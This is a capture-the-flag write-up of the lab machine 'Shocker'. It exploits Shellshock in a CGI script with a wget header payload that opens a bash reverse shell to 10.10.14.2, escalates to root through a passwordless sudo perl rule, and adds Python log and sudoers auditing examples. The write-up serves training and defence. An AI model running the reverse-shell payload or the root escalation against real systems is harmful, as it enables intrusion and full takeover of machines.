HTB-Shocker

Aakash Kumar
7 min read · Mar 2, 2022


An OSCP-like Linux-based box rated easy.

Box Introduction

Box overview

This box is based on the HTTP Shellshock vulnerability, aka CVE-2014-6271. The vulnerability exists in bash versions 1.0.3 – 4.3. Shellshock was a critical security bug that allows an attacker to execute arbitrary commands: when a vulnerable bash imports a function definition stored in an environment variable, it also executes whatever command follows the function body.

Example of shellshock vulnerability

This box requires a fine degree of enumeration plus a little observation to gain the initial foothold. Without further ado, let's dive into the box and begin with the enumeration phase.

Enumeration

Initiating an nmap scan to find the open ports and running services. Running a quick nmap scan, i.e. nmap 10.10.10.56

PORT     STATE SERVICE
80/tcp   open  http
2222/tcp open  EtherNetIP-1

From the quick nmap scan, we discovered two open ports with running services. Let's run another scan to get detailed information about those services. Running an nmap scan to fingerprint the services, i.e. nmap -sC -sV -p80,2222 10.10.10.56

Command explanation:

nmap:  to initiate the nmap command
-sC: to run the default scripts
-sV: to find out the service's versions
-p: to specify the port numbers

Output of above command:

PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Short notes derived from the above result:

  • On port 80, Apache HTTP server version 2.4.18 is running. This version of Apache has no known vulnerability that would get us straight to arbitrary code execution.
  • On port 2222, there is an SSH service running, OpenSSH 7.2p2, which provides a command-line interface for interacting with the machine. But to use SSH we need valid credentials, and unfortunately we don't have any at the moment.
  • Also observed that the target machine is running Ubuntu.

Let's check what is happening on port 80.

Homepage

On the homepage, there’s only a cartoon saying Don’t Bug Me!

Looked into the source code of the homepage but found nothing interesting to proceed with.

Not much information was revealed by the nmap scan. Let's try directory brute forcing. We will be using gobuster for directory brute forcing, i.e. gobuster dir --url http://10.10.10.56/ -w /usr/share/wordlists/dirb/common.txt -t 100

Command explanation:

gobuster:   to initiate the command
dir: set gobuster at directory/files enumeration mode
--url: to specify the url
-w: to specify the wordlist
-t: to assign the number of concurrent threads

Output of above command:

/.hta                 (Status: 403) [Size: 290]
/.htaccess            (Status: 403) [Size: 295]
/.htpasswd            (Status: 403) [Size: 295]
/cgi-bin/             (Status: 403) [Size: 294]
/index.html           (Status: 200) [Size: 137]
/server-status        (Status: 403) [Size: 299]

Here is the result of the gobuster run; we found a new directory, /cgi-bin/. Visited this directory in the browser…

Accessing /cgi-bin/ directory

After doing some research about /cgi-bin/, found that it is the directory where the web server keeps CGI scripts: programs the server executes on each request to generate the page, passing the request headers to them as environment variables. Also found that a well-known vulnerability is associated with this /cgi-bin/ directory, the HTTP Shellshock vulnerability aka CVE-2014-6271: if a script there is written in bash (or invokes bash), a crafted header value lands in bash's environment and is parsed as a function definition.

It could be a good injection point, but we have to make sure whether our target is vulnerable to this vulnerability or not. While researching this, I came across the article Exploiting CGI Scripts with Shellshock. This article explains in detail how to exploit the Shellshock vulnerability.

In order to check if our target is vulnerable, we will need a bash script on the target machine, but we have no idea yet whether any script exists there. For that, we will use gobuster again, this time for file brute forcing, i.e.

gobuster dir --url http://10.10.10.56/cgi-bin/ -w /usr/share/wordlists/dirb/common.txt -x .sh -t 100

Command explanation:

gobuster:  to initiate the command
dir: to specify file/directory enumeration mode
--url: to specify the url
-w: to specify the wordlist
-x: to specify the extension of the files we are looking for (.sh)
-t: to assign the number of concurrent threads

Output of the above command:

/.hta                 (Status: 403) [Size: 298]
/.htaccess            (Status: 403) [Size: 303]
/.htpasswd            (Status: 403) [Size: 303]
/.htaccess.sh         (Status: 403) [Size: 306]
/.hta.sh              (Status: 403) [Size: 301]
/.htpasswd.sh         (Status: 403) [Size: 306]
/user.sh              (Status: 200) [Size: 118]

Found a new file, user.sh, in the /cgi-bin/ directory. Now we check whether the target is vulnerable to Shellshock, using nmap's http-shellshock.nse script, i.e.

nmap -sV -p80 --script=http-shellshock.nse --script-args uri=/cgi-bin/user.sh 10.10.10.56

Command explanation:

nmap:          to initiate the command
-sV: to fingerprint the service's version
--script=: to specify the script name
--script-args: to specify the script's arguments
uri=: the script argument giving the path of the CGI script to test

Output of above command:

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-shellshock:
|   VULNERABLE:
|   HTTP Shellshock vulnerability
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2014-6271
|       This web application might be affected by the vulnerability known
|       as Shellshock. It seems the server is executing commands injected
|       via malicious HTTP headers.
|
|     Disclosure date: 2014-09-24
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271
|       http://seclists.org/oss-sec/2014/q3/685
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169
|_      http://www.openwall.com/lists/oss-security/2014/09/24/10
|_http-server-header: Apache/2.4.18 (Ubuntu)

The above output shows that our target is vulnerable to Shellshock. Now we need to exploit it to gain access to the server.

We will exploit this by sending a request with a manipulated User-Agent header using the wget utility…

wget -q -U "() { :;}; echo Content-type: text/html; echo; echo; /bin/bash -i >& /dev/tcp/10.10.14.2/9000 0>&1" http://10.10.10.56/cgi-bin/user.sh

Command explanation:

wget:  to initiate the command
-q: to turn off wget's output
-U: to specify the user-agent string
--------------------------------------------------------------------
"() { :;}; echo Content-type: text/html; echo; echo; /bin/bash -i >& /dev/tcp/10.10.14.2/9000 0>&1"
- () { :;} ---> function definition (an empty bash function; this prefix is what bash recognises in the environment variable)
- echo Content-type: text/html ---> specifying content type
- echo; echo ---> to leave blank lines (ends the HTTP headers so the server accepts the CGI output)
- /bin/bash -i ---> to launch bash in interactive mode
- >& /dev/tcp/10.10.14.2/9000 ---> redirect stdout and stderr into a TCP connection to the assigned ip & port (bash's /dev/tcp pseudo-device)
- 0>&1 ---> attach stdin to the same connection, so input typed at the listener reaches the shell

But before executing the above command, start the netcat listener to catch the reverse shell.

Netcat listener on port 9000

Now, once we execute the above command, we get a reverse shell in the netcat listener terminal.

reverse shell

In the above screenshot, three actions are shown:

  • Started a netcat listener on the right side using nc -lvp 9000
  • On the left side, executed the command, i.e.
wget -q -U "() { :;}; echo Content-type: text/html; echo; echo; /bin/bash -i >& /dev/tcp/10.10.14.2/9000 0>&1" http://10.10.10.56/cgi-bin/user.sh
  • On the right side, we got the shell…
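From the defender's side, the request above leaves a trace in the web server's access log: the CGI interface exports each request header to the script as an environment variable (User-Agent becomes HTTP_USER_AGENT), and it is the "() {" prefix of the value that bash misparses as a function definition. The following Python detector is an added example, not code from the write-up; it parses Apache combined-format log lines and flags that marker in the headers a CGI script would receive, and the log lines are constructed.

```python
import re

# Apache "combined" log format: ip ident user [time] "request" status size "referer" "user-agent"
COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Bash only treats an environment value as an exported function when it starts
# with "() {". CVE-2014-6271 is that whatever followed the function body was
# executed as well. Whitespace between "()" and "{" is accepted, so tolerate it.
SHELLSHOCK = re.compile(r'\(\)\s*\{')

def cgi_env_name(header):
    """Environment variable name a CGI server gives a request header (RFC 3875)."""
    if header.lower() in ("content-type", "content-length"):
        return header.upper().replace("-", "_")
    return "HTTP_" + header.upper().replace("-", "_")

def find_shellshock(log_lines):
    """Return (ip, request, env_var, value) for every header field in the log
    that carries the "() {" marker; unparseable lines are skipped."""
    hits = []
    for line in log_lines:
        m = COMBINED.match(line)
        if not m:
            continue
        for header, field in (("User-Agent", "agent"), ("Referer", "referer")):
            value = m.group(field)
            if SHELLSHOCK.search(value):
                hits.append((m.group("ip"), m.group("request"), cgi_env_name(header), value))
    return hits

# Constructed sample lines; the second one mirrors the wget request in this write-up.
SAMPLE_LOG = [
    '10.10.14.2 - - [02/Mar/2022:10:00:01 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "Wget/1.21"',
    '10.10.14.2 - - [02/Mar/2022:10:00:05 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" '
    '"() { :;}; echo Content-type: text/html; echo; echo; /bin/bash -i >& /dev/tcp/10.10.14.2/9000 0>&1"',
    '10.10.14.2 - - [02/Mar/2022:10:00:09 +0000] "GET /index.html HTTP/1.1" 200 137 "() {  :; }; id" "curl/7.81.0"',
    'not a log line',
]

if __name__ == "__main__":
    for ip, request, var, value in find_shellshock(SAMPLE_LOG):
        print(f"{ip} {request} -> {var} = {value[:45]}")
```

The same marker is what the nmap script and the usual WAF rules look for, so a hit here means the header reached the server whether or not the script behind it was vulnerable.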

The shell we got is not stable, so we need to upgrade to a more stable one. We will spawn a pty using python3, i.e.

python3 -c 'import pty; pty.spawn("/bin/sh")'
user shell

So far, we have a shell as user shelly. Now we can read the user.txt file to get the user flag.

user flag

Now we are heading for the root user. For that we do some recon in our existing shell and figure out how to get root access.

privesc

Found a binary, /usr/bin/perl, that can be executed with sudo without a password. This means we can run any command as root through this binary, even without knowing the password. Let's use it to exec a shell.

root shell

Here we got the root shell using sudo /usr/bin/perl -e 'exec "/bin/bash"'
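A NOPASSWD sudo rule for an interpreter is the misconfiguration that hands over root here, and it is easy to audit for. The following Python check is an added example, not part of the write-up: it parses plain sudoers rule lines (one rule per line, no aliases or line continuations) and reports passwordless rules that grant ALL or an interpreter; the sudoers excerpt and the interpreter list are constructed for the example.

```python
import re

# A passwordless sudo rule for an interpreter is an unrestricted root shell,
# as with /usr/bin/perl on this box; ALL is worse still.
INTERPRETERS = {"perl", "python", "python2", "python3", "bash", "sh", "ruby", "php", "node"}
# who  host=(runas)  [TAG: ...] command[, command...]   (one rule per line, no aliases)
RULE = re.compile(r'^(?P<who>\S+)\s+(?P<host>\S+)=\((?P<runas>[^)]*)\)\s+(?P<rest>.+)$')
TAG = re.compile(r'([A-Z_]+):\s*')   # NOPASSWD:, SETENV:, NOEXEC: ...
SKIP = ("Defaults", "User_Alias", "Cmnd_Alias", "Host_Alias", "Runas_Alias")

def parse_sudoers(text):
    """Yield (who, runas, tags, commands) per rule line; comments, blanks,
    Defaults and alias definitions are skipped."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith(SKIP):
            continue
        m = RULE.match(line)
        if not m:
            continue
        rest, tags = m.group("rest"), []
        t = TAG.match(rest)
        while t:                       # peel off leading tags such as NOPASSWD:
            tags.append(t.group(1))
            rest = rest[t.end():]
            t = TAG.match(rest)
        yield m.group("who"), m.group("runas"), tags, [c.strip() for c in rest.split(",")]

def risky_nopasswd_rules(text):
    """Return (who, runas, command) for NOPASSWD rules granting ALL or an interpreter."""
    findings = []
    for who, runas, tags, cmds in parse_sudoers(text):
        if "NOPASSWD" not in tags:
            continue
        for cmd in cmds:
            binary = cmd.split(" ", 1)[0].rsplit("/", 1)[-1]   # "/usr/bin/perl" -> "perl"
            if cmd == "ALL" or binary in INTERPRETERS:
                findings.append((who, runas, cmd))
    return findings

# Constructed sudoers excerpt; the shelly line reproduces the rule found on the box.
SAMPLE_SUDOERS = """\
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
shelly  ALL=(root) NOPASSWD: /usr/bin/perl
backup  ALL=(root) NOPASSWD: /usr/bin/rsync, /usr/bin/tar
deploy  ALL=(root) NOPASSWD: ALL
"""
```

risky_nopasswd_rules(SAMPLE_SUDOERS) returns the shelly perl rule and the deploy ALL rule, while the backup rule for rsync and tar is left alone because neither binary is an interpreter.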

Now we can get root flag…

root flag

Written by Aakash Kumar

Security Researcher | eWPTXv2